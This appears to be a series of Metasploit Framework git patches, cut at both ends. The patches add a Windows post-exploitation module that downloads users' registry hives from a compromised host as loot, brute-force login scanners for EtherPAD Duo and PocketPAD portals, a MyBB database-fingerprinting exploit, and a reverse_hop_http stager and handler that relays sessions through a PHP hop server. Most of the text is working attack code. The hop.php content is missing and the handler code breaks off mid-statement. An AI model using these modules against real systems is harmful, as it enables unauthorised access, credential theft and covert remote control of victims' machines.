process_hive(sys_path, user, local_hive_copy, table, muicache, hive_file) + # This function will check if the filepath contains a registry hive + # and if it does it'll proceed to call the function responsible of + # downloading the hive. After successfull download it'll continue to + # call the hive_parser function which will extract the contents of + # the MUICache registry key. + user_home_path = expand_path(sys_path) + hive_path = user_home_path + hive_file + ntuser_status = client.fs.file.exists?(hive_path) + if ntuser_status == true + print_status("Downloading #{user}'s NTUSER.DAT/USERCLASS.DAT file..") + hive_status = hive_download_status(local_hive_copy, hive_path) + if hive_status == true + hive_parser(local_hive_copy, muicache, user, table) + else + print_error("All registry hive download attempts failed. Unable to continue.") + return nil + end + else + print_error("Couldn't locate/download #{user}'s registry hive. Can't proceed.") + return nil + end + end + + def hive_download_status(local_hive_copy, hive_path) + # This function downloads registry hives and checks for integrity + # after the transfer has completed so that we don't end up + # processing broken registry hive. + hive_status = false + 3.times do + remote_hive_hash_raw = client.fs.file.md5(hive_path) + unless remote_hive_hash_raw.blank? + remote_hive_hash = remote_hive_hash_raw.unpack('H*') + session.fs.file.download_file(local_hive_copy, hive_path) + local_hive_hash = file_local_digestmd5(local_hive_copy) + if local_hive_hash == remote_hive_hash[0] + print_good("Hive downloaded successfully.") + hive_status = true + break + else + print_error("Hive download corrupted, trying again (max 3 times)..") + File.delete(local_hive_copy) # Downloaded corrupt hive gets deleted before new attempt is made + hive_status = false + end + end + end + return hive_status + end + + def hive_parser(local_hive_copy, muicache, user, table) + # This function is responsible for parsing the downloaded hive and + # extracting the contents of the MUICache registry key. + print_status("Phase 3: Parsing registry content..") + err_msg = "Error parsing hive. Can't continue." + hive = Rex::Registry::Hive.new(local_hive_copy) + if hive.nil? + print_error(err_msg) + return nil + else + muicache_key = hive.relative_query(muicache) + if muicache_key.nil? + print_error(err_msg) + return nil + else + muicache_key_value_list = muicache_key.value_list + if muicache_key_value_list.nil? + print_error(err_msg) + return nil + else + muicache_key_values = muicache_key_value_list.values + if muicache_key_values.nil? + print_error(err_msg) + return nil + else + muicache_key_values.each do |value| + key = value.name + if key[0] != "@" and key != "LangID" and not key.nil? + check_file_exists(key, user, table) + end + end + end + end + end + end + File.delete(local_hive_copy) # Downloaded hive gets deleted after processing + return table + end + + def print_usernames(sys_users) + # This prints usernames pulled from the paths found from the + # registry. + user_list = Array.new + sys_users.each do |user| + user_list << user + end + users = user_list.join(", ") + print_good("Found users: #{users}") + end + + def run + + # Information about the MUICache registry key was collected from: + # + # - Windows Forensic Analysis Toolkit / 2012 / Harlan Carvey + # - Windows Registry Forensics / 2011 / Harlan Carvey + # - http://forensicartifacts.com/2010/08/registry-muicache/ + # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots + + print_status("Starting to enumerate MuiCache registry keys..") + sysnfo = client.sys.config.sysinfo['OS'] + if sysnfo =~/(Windows XP)/ and is_admin? + print_good("Remote system supported: #{sysnfo}") + muicache = "\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache" + hive_file = "\\NTUSER.DAT" + elsif sysnfo =~/(Windows 7)/ and is_admin? + print_good("Remote system supported: #{sysnfo}") + muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache" + hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" + else + print_error("Unsupported OS or not enough privileges. Unable to continue.") + return nil + end + + table = Rex::Ui::Text::Table.new( + 'Header' => 'MUICache Information', + 'Indent' => 1, + 'Columns' => + [ + "Username", + "File path", + "File status", + ]) + + print_status("Phase 1: Searching usernames..") + sys_users, sys_paths, sys_sids = find_usernames() + unless sys_users.blank? + print_usernames(sys_users) + else + print_error("Was not able to find any user accounts. Unable to continue.") + return nil + end + + print_status("Phase 2: Searching registry hives..") + muicache_reg_keys = enum_muicache_paths(sys_sids, muicache) + results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file, table).to_s + + print_status("Phase 4: Processing results..") + loot = store_loot("muicache_info", "text/plain", session, results, nil, "MUICache Information") + print_line("\n" + results + "\n") + print_status("Results stored in: #{loot}") + print_status("Execution finished.") + end +end From 5f5ca1c0117e354088eeb3b5eed82a25c56ba8a5 Mon Sep 17 00:00:00 2001 From: jiuweigui Date: Tue, 14 Jan 2014 20:56:14 +0200 Subject: [PATCH 010/853] Minor fix based on suggestions --- modules/post/windows/gather/enum_muicache.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index 273305939d..f33bc63c93 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -50,9 +50,9 @@ class Metasploit3 < Msf::Post else profile_subkeys.each do |user_sid| if user_sid.length > 10 - user_home_path = registry_getvaldata("HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList\\#{user_sid}", "ProfileImagePath") + user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath") unless user_home_path.blank? - full_path = user_home_path.delete("\00") + full_path = user_home_path.strip usernames << full_path.split("\\").last user_homedir_paths << full_path user_sids << user_sid @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Post hive_path = user_home_path + hive_file ntuser_status = client.fs.file.exists?(hive_path) if ntuser_status == true - print_status("Downloading #{user}'s NTUSER.DAT/USERCLASS.DAT file..") + print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") hive_status = hive_download_status(local_hive_copy, hive_path) if hive_status == true hive_parser(local_hive_copy, muicache, user, table) @@ -232,7 +232,8 @@ class Metasploit3 < Msf::Post # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots print_status("Starting to enumerate MuiCache registry keys..") - sysnfo = client.sys.config.sysinfo['OS'] + sysnfo = sysinfo['OS'] + if sysnfo =~/(Windows XP)/ and is_admin? print_good("Remote system supported: #{sysnfo}") muicache = "\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache" From 88b2e6b1c3728cb6b09fe0d1b01de53407a83a78 Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Wed, 5 Feb 2014 20:17:11 +0200 Subject: [PATCH 011/853] EtherPAD Duo Login I've run it through retab. Msfpro loads the module fine. msftidy seems broken though. Gives this on run: msftidy.rb:444: undefined (?...) sequence: /(?])/ BR --- .../auxiliary/scanner/http/ehterpadduo_login | 104 ++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 modules/auxiliary/scanner/http/ehterpadduo_login diff --git a/modules/auxiliary/scanner/http/ehterpadduo_login b/modules/auxiliary/scanner/http/ehterpadduo_login new file mode 100644 index 0000000000..27bf9631c3 --- /dev/null +++ b/modules/auxiliary/scanner/http/ehterpadduo_login @@ -0,0 +1,104 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'EtherPAD Duo Login Brute Force Utility', + 'Description' => %{ + This module scans for EtherPAD Duo login portal, and + performs a login brute force attack to identify valid credentials. + }, + 'Author' => + [ + 'Karn Ganeshen ', + ], + 'License' => MSF_LICENSE + + )) + + end + + def run_host(ip) + unless is_app_epaduo? + return + end + + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + # + # What's the point of running this module if the target actually isn't EtherPAD Duo + # + + def is_app_epaduo? + begin + res = send_request_cgi( + { + 'uri' => '/CGI/mParseCGI?file=mainpage.html', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + return false + end + + if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) + vprint_good("#{peer} - Running EtherPAD Duo application ...") + return true + else + vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") + return false + end + end + + # + # Brute-force the login page + # + + def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/config/configindex.ehtml', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("EtherPAD")) + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { + :host => rhost, + :port => rport, + :sname => 'EtherPAD Duo Portal', + :user => user, + :pass => pass, + :active => true, + :type => 'password' + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + end + + end + end From 73418a975adc221c6852e70be3599faa5ed74f4e Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Wed, 5 Feb 2014 20:20:30 +0200 Subject: [PATCH 012/853] Rename ehterpadduo_login to ehterpadduo_login.rb --- .../scanner/http/{ehterpadduo_login => ehterpadduo_login.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/http/{ehterpadduo_login => ehterpadduo_login.rb} (100%) diff --git a/modules/auxiliary/scanner/http/ehterpadduo_login b/modules/auxiliary/scanner/http/ehterpadduo_login.rb similarity index 100% rename from modules/auxiliary/scanner/http/ehterpadduo_login rename to modules/auxiliary/scanner/http/ehterpadduo_login.rb From 32e46c00d3652094e914c949159a6974624fc2dd Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Wed, 5 Feb 2014 20:21:16 +0200 Subject: [PATCH 013/853] Rename ehterpadduo_login.rb to etherpadduo_login.rb --- .../scanner/http/{ehterpadduo_login.rb => etherpadduo_login.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/http/{ehterpadduo_login.rb => etherpadduo_login.rb} (100%) diff --git a/modules/auxiliary/scanner/http/ehterpadduo_login.rb b/modules/auxiliary/scanner/http/etherpadduo_login.rb similarity index 100% rename from modules/auxiliary/scanner/http/ehterpadduo_login.rb rename to modules/auxiliary/scanner/http/etherpadduo_login.rb From 2c0ce2dffcc78a23010c2b8ee2a656abd367a92c Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Wed, 5 Feb 2014 20:22:52 +0200 Subject: [PATCH 014/853] PocketPAD login --- .../auxiliary/scanner/http/pocketpad_login.rb | 107 ++++++++++++++++++ 1 file changed, 107 insertions(+) create mode 100644 modules/auxiliary/scanner/http/pocketpad_login.rb diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb new file mode 100644 index 0000000000..a1c20290ad --- /dev/null +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -0,0 +1,107 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'PocketPAD Login Brute Force Utility', + 'Description' => %{ + This module scans for PocketPAD login portal, and + performs a login brute force attack to identify valid credentials. + }, + 'Author' => + [ + 'Karn Ganeshen ', + ], + 'License' => MSF_LICENSE + + )) + + end + + def run_host(ip) + unless is_app_popaduo? + return + end + + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + # + # What's the point of running this module if the target actually isn't PocketPAD + # + + def is_app_popaduo? + begin + res = send_request_cgi( + { + 'uri' => '/', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + return false + end + + if (res and res.code == 200 and res.headers['Server'].include?("Smeagol") and res.body.include?("PocketPAD")) + vprint_good("#{peer} - Running PocketPAD application ...") + return true + else + vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") + return false + end + end + + # + # Brute-force the login page + # + + def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/cgi-bin/config.cgi', + 'method' => 'POST', + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + 'file' => "configindex.html" + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("Smeagol")) + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { + :host => rhost, + :port => rport, + :sname => 'PocketPAD Portal', + :user => user, + :pass => pass, + :active => true, + :type => 'password' + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + end + + end +end From 036ae2fd80edb5f43d2f37fbb71ff07f89e04805 Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Thu, 6 Feb 2014 16:25:41 +0200 Subject: [PATCH 015/853] msftidy done --- .../scanner/http/etherpadduo_login.rb | 146 +++++++++--------- 1 file changed, 72 insertions(+), 74 deletions(-) diff --git a/modules/auxiliary/scanner/http/etherpadduo_login.rb b/modules/auxiliary/scanner/http/etherpadduo_login.rb index 27bf9631c3..42d9bcc6cb 100644 --- a/modules/auxiliary/scanner/http/etherpadduo_login.rb +++ b/modules/auxiliary/scanner/http/etherpadduo_login.rb @@ -7,85 +7,84 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Report - include Msf::Auxiliary::AuthBrute - include Msf::Auxiliary::Scanner +include Msf::Exploit::Remote::HttpClient +include Msf::Auxiliary::Report +include Msf::Auxiliary::AuthBrute +include Msf::Auxiliary::Scanner - def initialize(info={}) - super(update_info(info, - 'Name' => 'EtherPAD Duo Login Brute Force Utility', - 'Description' => %{ +def initialize(info={}) + super(update_info(info, + 'Name' => 'EtherPAD Duo Login Brute Force Utility', + 'Description' => %{ This module scans for EtherPAD Duo login portal, and performs a login brute force attack to identify valid credentials. - }, - 'Author' => + }, + 'Author' => [ 'Karn Ganeshen ', ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE + )) - )) +end +def run_host(ip) + unless is_app_epaduo? + return + end + + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) + end +end + +# +# What's the point of running this module if the target actually isn't EtherPAD Duo +# + +def is_app_epaduo? + begin + res = send_request_cgi( + { + 'uri' => '/CGI/mParseCGI?file=mainpage.html', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + return false + end + + if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) + vprint_good("#{peer} - Running EtherPAD Duo application ...") + return true + else + vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") + return false end + end - def run_host(ip) - unless is_app_epaduo? - return - end +# +# Brute-force the login page +# - print_status("#{peer} - Starting login brute force...") - each_user_pass do |user, pass| - do_login(user, pass) - end - end - - # - # What's the point of running this module if the target actually isn't EtherPAD Duo - # - - def is_app_epaduo? - begin - res = send_request_cgi( - { - 'uri' => '/CGI/mParseCGI?file=mainpage.html', - 'method' => 'GET' - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") - return false - end - - if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) - vprint_good("#{peer} - Running EtherPAD Duo application ...") - return true - else - vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") - return false - end - end - - # - # Brute-force the login page - # - - def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") - begin - res = send_request_cgi( - { - 'uri' => '/config/configindex.ehtml', - 'method' => 'GET', +def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/config/configindex.ehtml', + 'method' => 'GET', 'authorization' => basic_auth(user,pass) - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") - return :abort - end + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end - if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("EtherPAD")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") - report_hash = { + if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("EtherPAD")) + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { :host => rhost, :port => rport, :sname => 'EtherPAD Duo Portal', @@ -93,12 +92,11 @@ class Metasploit3 < Msf::Auxiliary :pass => pass, :active => true, :type => 'password' - } - report_auth_info(report_hash) - return :next_user - else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") - end - - end + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end +end +end From 4c01420f38193eff13ddb6673d72b425ee8d2442 Mon Sep 17 00:00:00 2001 From: Karn Ganeshen Date: Thu, 6 Feb 2014 16:52:39 +0200 Subject: [PATCH 016/853] msftidy done --- .../auxiliary/scanner/http/pocketpad_login.rb | 179 +++++++++--------- 1 file changed, 88 insertions(+), 91 deletions(-) diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index a1c20290ad..2db142e4df 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -7,101 +7,98 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Report - include Msf::Auxiliary::AuthBrute - include Msf::Auxiliary::Scanner - - def initialize(info={}) - super(update_info(info, - 'Name' => 'PocketPAD Login Brute Force Utility', - 'Description' => %{ - This module scans for PocketPAD login portal, and - performs a login brute force attack to identify valid credentials. - }, - 'Author' => - [ - 'Karn Ganeshen ', - ], - 'License' => MSF_LICENSE +include Msf::Exploit::Remote::HttpClient +include Msf::Auxiliary::Report +include Msf::Auxiliary::AuthBrute +include Msf::Auxiliary::Scanner +def initialize(info={}) + super(update_info(info, + 'Name' => 'PocketPAD Login Brute Force Utility', + 'Description' => %{ + This module scans for PocketPAD login portal, and + performs a login brute force attack to identify valid credentials. + }, + 'Author' => + [ + 'Karn Ganeshen ', + ], + 'License' => MSF_LICENSE )) +end +def run_host(ip) + unless is_app_popad? + return end - def run_host(ip) - unless is_app_popaduo? - return - end - - print_status("#{peer} - Starting login brute force...") - each_user_pass do |user, pass| - do_login(user, pass) - end - end - - # - # What's the point of running this module if the target actually isn't PocketPAD - # - - def is_app_popaduo? - begin - res = send_request_cgi( - { - 'uri' => '/', - 'method' => 'GET' - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") - return false - end - - if (res and res.code == 200 and res.headers['Server'].include?("Smeagol") and res.body.include?("PocketPAD")) - vprint_good("#{peer} - Running PocketPAD application ...") - return true - else - vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") - return false - end - end - - # - # Brute-force the login page - # - - def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") - begin - res = send_request_cgi( - { - 'uri' => '/cgi-bin/config.cgi', - 'method' => 'POST', - 'authorization' => basic_auth(user,pass), - 'vars_post' => { - 'file' => "configindex.html" - } - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") - return :abort - end - - if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("Smeagol")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") - report_hash = { - :host => rhost, - :port => rport, - :sname => 'PocketPAD Portal', - :user => user, - :pass => pass, - :active => true, - :type => 'password' - } - report_auth_info(report_hash) - return :next_user - else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") - end - + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) end end + +# +# What's the point of running this module if the target actually isn't PocketPAD +# + +def is_app_popad? + begin + res = send_request_cgi( + { + 'uri' => '/', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + false return + end + + if (res and res.code == 200 and res.headers['Server'].include?("Smeagol") and res.body.include?("PocketPAD")) + vprint_good("#{peer} - Running PocketPAD application ...") + return true + else + vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") + return false + end +end + +# +# Brute-force the login page +# + +def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/cgi-bin/config.cgi', + 'method' => 'POST', + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + 'file' => "configindex.html" + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("Smeagol")) + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { + :host => rhost, + :port => rport, + :sname => 'PocketPAD Portal', + :user => user, + :pass => pass, + :active => true, + :type => 'password' + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + end +end +end From f9f2c401ca141216094be295ed52bf0986ce20b6 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 14 Feb 2014 13:12:43 -0800 Subject: [PATCH 017/853] Create myBB_GetTypeDB This exploit allows you to specify the type of database forum Mybb. Works by the operator wrongly used REGEXP. Which is not supported in postgreSQL and SQLite databases. --- modules/exploits/multi/http/myBB_GetTypeDB | 118 +++++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 modules/exploits/multi/http/myBB_GetTypeDB diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/exploits/multi/http/myBB_GetTypeDB new file mode 100644 index 0000000000..a39fd38c09 --- /dev/null +++ b/modules/exploits/multi/http/myBB_GetTypeDB @@ -0,0 +1,118 @@ +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MyBB type database extractor', + 'Description' => %q{ + This module exploits vulnerability in MyBB. + Provide type of database in forum + This affects versions <= 1.6.12 + }, + 'Author' => + [ + 'Arthur Karmanovskii', # Discovery + 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ '0 - days', '2014-13-02' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) + ], self.class) + end + + def check + begin + print_status("URI: #{datastore['TARGETURI']}") + uri = normalize_uri(target_uri.path, '/index.php') + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Keep-Alive', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + rescue + print_error("Unable to connect to server.") + return CheckCode::Unknown + end + + if res.code != 200 + print_error("Unable to query to host") + return CheckCode::Unknown + end + + php_version = res['X-Powered-By'] + if php_version + print_good("PHP Version: #{php_version}") + else + print_status("Unknown PHP Version") + return CheckCode::Unknown + end + + _Version_server = res['Server'] + if _Version_server + print_good("Server Version: #{_Version_server}") + else + print_status("Unknown Server Version") + return CheckCode::Unknown + end + return CheckCode::Detected + end + + def exploit + uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + response = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + if response.nil? + fail_with(Failure::NotFound, "Failed to retrieve webpage.") + end + #Resolve response + if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) + print_good("Database is: PostgreSQL ;)") + elsif response.body.match(/General error\: 1 no such function\: REGEXP/) + print_good("Database is: SQLite ;)") + else response.body.match(/Member List/) + print_status("Database MySQL or this is not forum MyBB or unknown Database") + end + + end +end + From 5f7a0e162cebb3ae476d88acbc48c8b783efbb09 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Mon, 30 Dec 2013 01:23:40 -0600 Subject: [PATCH 018/853] Add reverse_hop_http stager and handler --- data/php/hop.php | 64 ++++ lib/msf/core/handler/reverse_hop_http.rb | 277 +++++++++++++++++ .../stagers/windows/reverse_hop_http.rb | 292 ++++++++++++++++++ 3 files changed, 633 insertions(+) create mode 100644 data/php/hop.php create mode 100644 lib/msf/core/handler/reverse_hop_http.rb create mode 100644 modules/payloads/stagers/windows/reverse_hop_http.rb diff --git a/data/php/hop.php b/data/php/hop.php new file mode 100644 index 0000000000..08cefe5df8 --- /dev/null +++ b/data/php/hop.php @@ -0,0 +1,64 @@ + framework + } + ) + #First we need to verify we will not stomp on another handler's hop + if @@hophandlers.has_key? full_uri + raise RuntimeError, "Already running a handler for hop #{full_uri}." + end + @@hophandlers[full_uri] = self + self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri, + self) do |uri, hophttp| + control = "#{uri.request_uri}control" + hophttp.control = control + hophttp.send_new_stage(control) # send stage to hop + @finish = false + delay = 1 # poll delay + until @finish and hophttp.handlers.empty? + sleep delay + delay = delay + 1 if delay < 10 # slow down if we're not getting anything + crequest = hophttp.mclient.request_raw({'method' => 'GET', 'uri' => control}) + res = hophttp.mclient.send_recv(crequest) # send poll to the hop + if res.error + print_error(res.error) + next + end + + # validate response + received = res.body + magic = hophttp.magic + next if received.length < 12 or received.slice!(0, magic.length) != magic + + # good response + delay = 0 # we're talking, speed up + urlen = received.slice!(0,4).unpack('V')[0] + urlpath = received.slice!(0,urlen) + + #received is now the binary contents of the message + if hophttp.handlers.include? urlpath + pack = Rex::Proto::Http::Packet.new + pack.body = received + hophttp.current_url = urlpath + hophttp.handlers[urlpath].call(hophttp, pack) + else + #New session! + conn_id = urlpath.gsub("/","") + # Short-circuit the payload's handle_connection processing for create_session + # We are the dispatcher since we need to handle the comms to the hop + create_session(hophttp, { + :passive_dispatcher => self, + :conn_id => conn_id, + :url => urlpath, + :expiration => datastore['SessionExpirationTimeout'].to_i, + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, + :ssl => false, + }) + # send new stage to hop so next inbound session will get a unique ID. + hophttp.send_new_stage(control) + end + end + hophttp.monitor_thread = nil #make sure we're out + @@hophandlers.delete(full_uri) + end + end + + # + # Stops the handler and monitoring thread + # + def stop_handler + @finish = true + end + + # + # Adds a resource. (handler for a session) + # + def add_resource(res, opts={}) + self.handlers[res] = opts['Proc'] + start_handler if self.monitor_thread == nil + end + + # + # Removes a resource. + # + def remove_resource(res) + self.handlers.delete(res) + end + + # + # Implemented for compatibility reasons, does nothing + # + def close_client(cli) + end + + # + # Sends data to hop + # + def send_response(resp) + if not resp.body.empty? + crequest = 